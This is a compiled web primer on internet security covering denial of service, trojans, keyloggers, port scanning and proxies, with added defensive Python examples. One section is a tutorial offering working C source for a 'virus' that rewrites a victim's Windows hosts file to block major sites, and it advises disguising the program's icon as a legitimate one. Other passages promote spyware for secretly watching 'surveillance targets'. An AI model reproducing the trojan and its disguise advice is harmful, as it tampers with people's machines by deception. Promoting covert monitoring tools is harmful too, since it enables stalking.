
Denial Of Service Attack


It is real. On February 7, 2000, the Yahoo portal was shut down for about three hours. The retailer Buy.com Inc. (BUYX) was hit the next day, hours after going public. By that evening eBay (EBAY), Amazon.com (AMZN) and CNN (TWX) had gone dark, and the next morning the mayhem continued, with online broker E*Trade (EGRP) and others having traffic to their sites virtually choked off.


What is a Denial Of Service Attack?

 




  • A denial of service (DoS) attack renders a system unusable, or significantly slows it down, for legitimate users by exhausting some resource it depends on (link bandwidth, connection state, CPU, memory or disk), so that nobody can use the service.

  • An attacker who is unable to gain access to a machine may fall back to crashing or flooding it instead: the goal shifts from controlling the system to denying it to everyone else.


Types of denial of service attacks


There are several general categories of DoS attacks. Popularly, the attacks are divided into three classes:



  • bandwidth attacks, which saturate the target's link or packet-handling capacity with sheer volume (UDP or ICMP floods, for example),

  • protocol attacks, which exhaust state tables in the server or in firewalls and load balancers in front of it (a SYN flood that leaves thousands of half-open connections is the classic case), and

  • logic attacks, which send a malformed or unexpected input that makes a service crash or hang through a bug, so a single packet can be enough.



What is Distributed Denial of Service Attack?



  • In a distributed denial of service (DDoS) attack the attacker launches the attack from several machines at once. The attacker either breaks into those machines or coordinates several "zombies" (compromised hosts under remote control) to hit a target host or network at the same time.

  • This makes the attack hard to filter because the traffic originates from many IP addresses, each of which may look like an ordinary client.

  • If a single IP address is attacking a company, the company can block that address at its firewall. If it is 30,000 addresses, that is impractical, and blocking them one by one also cuts off legitimate users who share those addresses.
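To make that last point concrete, here is an added example (not from the original page) that runs a simple rate-based detector over constructed access-log lines. The thresholds, addresses and log content are assumptions chosen for illustration. It shows why a per-address firewall rule works against one flooding source but has nothing to match on when the same volume arrives from many zombies:

```python
import re
from collections import Counter, defaultdict
from datetime import datetime

# Common Log Format: source address first, timestamp in square brackets.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\]')

# Illustrative thresholds (assumed for this example, not taken from the page).
PER_IP_LIMIT = 10       # hits per window from one address before it is blocked
TOTAL_LIMIT = 40        # hits per window in aggregate before we call it a flood
WINDOW_SECONDS = 10


def parse_line(line):
    """Return (source_ip, seconds since epoch) for one log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    stamp = m.group(2).split()[0]                      # drop the "+0000" zone
    ts = datetime.strptime(stamp, "%d/%b/%Y:%H:%M:%S")
    return m.group(1), (ts - datetime(1970, 1, 1)).total_seconds()


def bucket_by_window(lines, window=WINDOW_SECONDS):
    """Group hits into fixed windows: {window_start: Counter(ip -> hits)}."""
    windows = defaultdict(Counter)
    for line in lines:
        parsed = parse_line(line)
        if parsed:
            ip, t = parsed
            windows[int(t // window) * window][ip] += 1
    return windows


def classify_window(hits, per_ip_limit=PER_IP_LIMIT, total_limit=TOTAL_LIMIT):
    """Return (verdict, ips_to_block) for one window of hits.

    One noisy source can be blocked by address at the firewall. In a
    distributed flood no single address crosses the per-IP limit, yet the
    aggregate does, so a per-address rule has nothing to match on.
    """
    noisy = sorted(ip for ip, n in hits.items() if n > per_ip_limit)
    if noisy:
        return "single-source flood", noisy
    if sum(hits.values()) > total_limit:
        return "distributed flood", []
    return "normal", []


def analyse(lines):
    """Map each window start to its verdict and block list, in time order."""
    return {start: classify_window(hits)
            for start, hits in sorted(bucket_by_window(lines).items())}


def build_sample_log():
    """Constructed traffic, not captured data: seconds 0-9 hold one address
    hammering the site, seconds 10-19 hold 30 'zombies' sending two hits each."""
    fmt = '{ip} - - [07/Feb/2000:10:00:{sec:02d} +0000] "GET / HTTP/1.0" 200 512'
    lines = [fmt.format(ip=f"203.0.113.{i + 1}", sec=i) for i in range(3)]
    lines += [fmt.format(ip="198.51.100.7", sec=i % 10) for i in range(20)]
    for z in range(30):
        lines += [fmt.format(ip=f"10.0.0.{z + 1}", sec=10 + (z + k) % 10)
                  for k in range(2)]
    return lines


if __name__ == "__main__":
    for start, (verdict, block) in analyse(build_sample_log()).items():
        print(start, verdict, block)
```

The first window yields a block list with one address; the second yields a "distributed flood" verdict with an empty block list, which is exactly the situation where the defender has to fall back on aggregate rate limiting, upstream scrubbing or anycast capacity rather than address filtering.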

Trojans and Backdoors

A Trojan horse is an unauthorized program hidden inside a legitimate program. The hidden code performs functions unknown to (and almost certainly unwanted by) the user.



  • It may be a legitimate program that has been altered by inserting unauthorized code into it.

  • Or it may be any program that appears to perform a desirable and necessary function while, through code the user knows nothing about, doing something else entirely, such as opening a backdoor for the attacker.


Working of Trojans




 



  • Once the trojaned system goes online, the attacker gains access to it through the trojan, typically a port it listens on or an outbound connection it makes back to the attacker.

  • Using that access, the attacker can stage attacks of different types: steal data, install further tools, or use the machine as a zombie against other targets.


Various Trojan Types



  • Remote Access Trojans

  • Password Sending Trojans

  • Keyloggers

  • Destructive

  • Denial Of Service (DoS) Attack Trojans

  • Proxy/Wingate Trojans

  • FTP Trojans

  • Software Detection Killers


Modes of Transmission



  • Attachments

  • Physical Access

  • Browser And E-mail Software Bugs

  • NetBIOS (File Sharing)

  • Fake Programs

  • Untrusted Sites And Freeware Software


Backdoor Countermeasures



  • Most commercial anti-virus products can automatically scan for and detect known backdoor programs before they can cause damage (e.g. before accessing removable media, running an executable or downloading mail). Signature-based scanners only catch samples they already know, so a freshly built or repacked trojan can slip past them.

  • An inexpensive tool called Cleaner (http://www.moosoft.com/cleanet.html) can identify and eradicate 1000 types of backdoor programs and trojans.

  • Educate your users not to install applications downloaded from the internet or received as e-mail attachments.

Keyloggers (Keystroke Loggers)

Keystroke loggers are stealthy software or hardware that capture keystrokes on their way from the keyboard to the application that should receive them. A software logger hooks the operating system's keyboard input path (for example a keyboard hook or a filter driver); a hardware logger sits physically between the keyboard and the computer. Either way, every key stroke is recorded.


There are two types of keystroke loggers:


1. Software based and

2. Hardware based.


Spyware: Spector (http://www.spector.com/)



  • Spector is spyware that records everything anyone does on the computer, online and offline.

  • Spector automatically takes hundreds of snapshots every hour, very much like a surveillance camera. With Spector, you will be able to see exactly what your surveillance targets have been doing online and offline.

  • Spector works by taking a snapshot of whatever is on the computer screen and saving it in a hidden location on the computer's hard drive.


Hacking Tool: eBlaster (http://www.spector.com/)


  • eBlaster lets you know exactly what your surveillance targets are doing on the internet even if you are thousands of miles away.

  • eBlaster records their e-mails, chats, instant messages, websites visited and keystrokes typed, and then automatically sends this recorded information to your own e-mail address.

  • Within seconds of them sending or receiving an e-mail, you will receive your own copy of that e-mail.


Hacking Tool: Hardware Keylogger (http://www.keyghost.com)


  • The Hardware Key Logger is a tiny hardware device that can be attached in between a keyboard and a computer.

  • It keeps a record of all key strokes typed on the keyboard. The recording process is totally transparent to the end user: no software runs on the host, so no anti-virus or process listing will show it. The attacker needs physical access once to plant it and again to retrieve the log.

Port Scanning

Port scanning is one of the most popular techniques used by attackers to discover services that can be compromised.



  • A potential target computer runs many 'services' that listen on 'well-known' ports (22/tcp for SSH and 80/tcp for HTTP, for example).

  • By scanning which ports answer on the victim, the attacker learns what software is exposed, and therefore where potential vulnerabilities may be exploited.

  • Scan techniques can be differentiated broadly into Vanilla, Strobe, Stealth, FTP Bounce, Fragmented Packets, Sweep and UDP scans.


Port Scanning Techniques




Port scanning techniques can be broadly classified into:



  • Open scan: a full TCP connect to each port. It needs no privileges, but the target's service logs every completed connection.

  • Half-open scan: send a SYN, read the SYN/ACK (open) or RST (closed) that comes back, and never complete the handshake. It needs raw-socket privileges and leaves less in application logs.

  • Stealth scan: packets outside the normal handshake (FIN, NULL, Xmas) that a standards-conforming stack answers with RST only for closed ports, or deliberately fragmented packets that some filters fail to reassemble.

  • Sweeps: one port probed across many hosts, to find which hosts run a particular service.

  • Misc: UDP scans, FTP bounce and other indirect techniques.
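The 'open scan' class above is easy to see in code. The following is an added example, not a tool from the page, that performs a TCP connect scan against a throwaway listener on 127.0.0.1 (the listener and the port choices are constructed for the demonstration). The half-open and stealth variants need raw sockets and privileges, so they are not shown; what this version shows is that a completed handshake means "open", a reset means "closed", silence means "filtered", and that the target's service sees every such connection:

```python
import socket
import threading


def scan_port(host, port, timeout=0.5):
    """Full three-way handshake: the 'open scan' class. Simple and
    unprivileged, but the target's service logs every connection."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
        except ConnectionRefusedError:
            return "closed"          # RST came back: nothing listening
        except socket.timeout:
            return "filtered"        # no SYN/ACK and no RST: dropped by a filter
        except OSError:
            return "filtered"        # e.g. host or network unreachable
        return "open"                # SYN/ACK received, handshake completed


def scan_ports(host, ports, timeout=0.5):
    """Map each port to its state: the technique applied across a port list."""
    return {p: scan_port(host, p, timeout) for p in ports}


def start_local_listener():
    """Open a throwaway service on 127.0.0.1 (a constructed target, not a
    real host) and return (server_socket, port). Connections are accepted
    and closed in a background thread so the scan has something to find."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    port = srv.getsockname()[1]

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:          # server socket closed: stop serving
                break
            conn.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv, port


def free_port():
    """Pick a port with no listener on it (bind to 0, read the number, release)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


if __name__ == "__main__":
    srv, open_port = start_local_listener()
    closed_port = free_port()
    print(scan_ports("127.0.0.1", [open_port, closed_port]))
    srv.close()
```

Run it and the listener's port reports "open" while the released port reports "closed"; point it at a host behind a firewall that silently drops packets and the timeout branch reports "filtered". The same three outcomes are what Nmap labels open, closed and filtered.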


Commonly used tools for port scanning


1. Tool: SuperScan 3.0


2. Tool: NMap (Network Mapper)


3. Tool: NetScan Tools Pro 2003


4. Tool: ipEye, IPSecScan


Proxy Servers and Anonymizers


A proxy is a network host that serves as an intermediary for connections to other hosts: the client talks to the proxy, and the proxy talks to the destination on the client's behalf. Proxies are usually used for the following purposes:



  • As a firewall, a proxy protects the local network from outside access, since external hosts only ever see and reach the proxy.

  • As an IP-address multiplexer, a proxy lets a number of computers reach the Internet through a single public IP address.

  • Proxy servers can be used (to some extent) to anonymize web surfing: the destination site sees the proxy's address rather than the client's.

  • Specialized proxy servers can filter out unwanted content, such as ads or 'unsuitable' material.

  • Proxy servers can afford some protection against attacks, because internal hosts are never contacted directly. The proxy itself then becomes the exposed system that must be kept patched and locked down.


Anonymizers



  • Anonymizers are services that help make your own web surfing anonymous.

  • The first anonymizer developed was Anonymizer.com, created in 1997 by Lance Cottrell.

  • An anonymizer strips identifying information from the user's requests as the user surfs: the destination site sees the anonymizer's IP address instead of the user's, and headers such as Referer and User-Agent can be removed or normalized. It hides the user from the destination, not from the anonymizer itself, which sees the whole session, so the user's privacy rests on trusting that service.

Creating a Virus to Block Websites


Most of us are familiar with the virus that used to block the Orkut and YouTube sites. If you are curious about creating such a virus on your own, then you are in the right place. Today I'll teach you how to create a simple program that blocks websites, and as usual I'll use my favourite programming language, C, to create it. I will give a brief introduction before jumping into the technical details.


This program has been written entirely in C, so anyone with a basic knowledge of C will be able to understand how it works. The victim needs to run it only once. Once run, it appends the list of websites specified in the source code to the system's hosts file, each mapped to 127.0.0.1. Because the hosts file is consulted by the operating system's resolver before any DNS query is made, the blocking is not confined to IE or Firefox: the names stop resolving in every browser and every other program on the machine, and they stay blocked until the added lines are removed from the hosts file (the removal steps are given below). Two practical points: on current Windows versions the hosts file is writable only by administrators, so the program must run with elevated rights, and most anti-malware products now flag hosts-file tampering. Strictly speaking the program does not replicate, so by the definitions at the end of this page it is a trojan rather than a virus, but I'll keep the popular name.


NOTE: You can also block a website manually. Here I have created a program that automates all the steps involved in blocking. The manual blocking process is described in the post How to Block a Website ?


Here is the source code.


#include <stdio.h>

/* Sites to block. Each name is mapped to the loopback address, so the
   system resolver answers 127.0.0.1 before any DNS query is made. */
static const char *site_list[] = {
    "google.com",
    "www.google.com",
    "youtube.com",
    "www.youtube.com",
    "yahoo.com",
    "www.yahoo.com"
};
#define SITE_COUNT (sizeof site_list / sizeof site_list[0])

static const char ip[] = "127.0.0.1";
static FILE *target;

/* Windows is not always installed on C:, so try C: through F: in turn.
   fopen() in "r+" mode checks both that the hosts file exists and that we
   are allowed to write it (on current Windows that needs administrator
   rights). Returns 1 with `target` open on success, 0 if no writable hosts
   file was found. */
static int find_root(void)
{
    const char drives[] = "CDEF";
    char path[64];
    int i;

    for (i = 0; drives[i] != '\0'; i++) {
        sprintf(path, "%c:\\windows\\system32\\drivers\\etc\\hosts", drives[i]);
        target = fopen(path, "r+");
        if (target != NULL)
            return 1;
    }
    return 0;
}

/* Append one "127.0.0.1<TAB>name" line per site to the end of the file. */
static void block_site(void)
{
    size_t i;

    fseek(target, 0, SEEK_END);          /* move to the end of the file */
    fputc('\n', target);                 /* start on a fresh line */
    for (i = 0; i < SITE_COUNT; i++)
        fprintf(target, "%s\t%s\n", ip, site_list[i]);
    fclose(target);
}

int main(void)
{
    if (find_root())
        block_site();
    return 0;
}


How to Compile?


1. Download the source code here. Download the compiled module (virus) here.


2. Compile the source code using any C/C++ compiler.


3. To test, run the compiled module with administrator rights. It will block the sites listed in the source code.


4. Once you have run block_Site.exe, restart your browser. Then type the URL of a blocked site and you'll see the browser report "Page cannot be displayed" (or the equivalent connection error), because the name now resolves to 127.0.0.1. You can confirm this from a command prompt with ping google.com, which will answer from 127.0.0.1.


5. To remove the virus, type the following in the Run dialog:

%windir%\system32\drivers\etc


6. There, open the file named "hosts" in Notepad. At the bottom of the file you'll see lines like this:


127.0.0.1	google.com


7. Delete all such entries that contain the names of blocked sites and save the file. The resolver cache may keep the old answer for a while; ipconfig /flushdns clears it on Windows.


NOTE: You can also change the ICON of the virus to make it look like a legitimate program. This method is described in the post: How to Change the ICON of an EXE file ?
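The defensive counterpart of the removal steps above, added here as an example and not part of the original post: a small audit that parses a hosts file, flags any name other than the standard loopback names that has been pointed at a sinkhole address (127.0.0.1, 0.0.0.0 or ::1), and produces a cleaned copy. The SAMPLE_HOSTS content is constructed to look like a file this program has touched; the whitelist of loopback names is an assumption that fits stock Windows and Linux files.

```python
import ipaddress

# Names that legitimately map to loopback in stock hosts files (assumed list).
LOOPBACK_NAMES = {"localhost", "localhost.localdomain", "broadcasthost",
                  "ip6-localhost", "ip6-loopback"}


def parse_hosts(text):
    """Yield (line_no, address, [names]) per entry; comments and blanks skipped."""
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()      # strip trailing comments
        if not line:
            continue
        fields = line.split()
        yield n, fields[0], fields[1:]


def is_sinkhole(address):
    """True for loopback or unspecified addresses (and for unparsable ones)."""
    try:
        addr = ipaddress.ip_address(address)
    except ValueError:
        return True
    return addr.is_loopback or addr.is_unspecified


def find_hijacks(text):
    """Return [(line_no, address, name)] for names aimed at a sinkhole.

    A public name mapped to 127.0.0.1 or 0.0.0.0 is the signature of the
    site-blocking trick; the legitimate loopback names are allowed through.
    """
    hits = []
    for n, address, names in parse_hosts(text):
        if not is_sinkhole(address):
            continue
        for name in names:
            if name.lower() not in LOOPBACK_NAMES:
                hits.append((n, address, name))
    return hits


def clean_hosts(text):
    """Return the file with hijacking lines removed (what steps 6-7 do by hand)."""
    bad = {n for n, _, _ in find_hijacks(text)}
    kept = [l for n, l in enumerate(text.splitlines(), 1) if n not in bad]
    return "\n".join(kept) + "\n"


# Constructed sample, not a real machine's file: a commented header, one
# legitimate internal entry, then the lines block_Site.exe would append.
SAMPLE_HOSTS = """\
# hosts file (constructed sample)
# localhost name resolution is handled by the resolver itself
#   127.0.0.1       localhost
10.0.0.5\tintranet.example   # constructed internal host

127.0.0.1\tgoogle.com
127.0.0.1\twww.google.com
0.0.0.0\tyoutube.com
"""

if __name__ == "__main__":
    for line_no, address, name in find_hijacks(SAMPLE_HOSTS):
        print(f"line {line_no}: {name} -> {address}")
    print(clean_hosts(SAMPLE_HOSTS))
```

On a real Windows machine, read %windir%\system32\drivers\etc\hosts into the text argument (on Linux or macOS, /etc/hosts); the same check belongs in any endpoint baseline, since hosts-file hijacking is also how malware redirects update and anti-virus domains, not just how pranks block YouTube.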

Common Terminologies used in Internet Security


If you are a newbie in Internet security, you have come to the right place. The following is information on some common terms used in Internet security, so next time you don't have to scratch your head when someone uses them.


Firewall: a system that acts as a barrier between your computer network and the Internet. A firewall controls the flow of traffic according to a security policy.


Hacker: anyone who specializes in getting into computer-based systems, for illegal purposes or just for the fun of it.


IP spoofing: forging the source address of packets so that they appear to come from another system, typically one your system trusts, in an attempt to get past address-based access controls.


Sniffing: capturing network traffic in order to read the data it carries. It mostly occurs on privately owned LANs connected to the web, where an attacker with a foothold on the segment can see other hosts' traffic.


Trojan horse: a program that pretends to be useful software while its real purpose is to access, steal or destroy user data and access credentials. Apart from destroying information, trojans can also create a backdoor on your system through which confidential information is stolen.


Virus: a program that attaches itself to another program or file and runs whenever that file is executed, infecting further files as it goes. It spreads as infected files are copied across networks or media, and its payload can damage software and data. To operate, a virus requires the execution of the file it is attached to.


Worm: similar to a virus, except that it is self-contained and does not need a user to run an infected file to become active. It replicates itself as it travels across networks, usually by exploiting vulnerable network services on the hosts it reaches.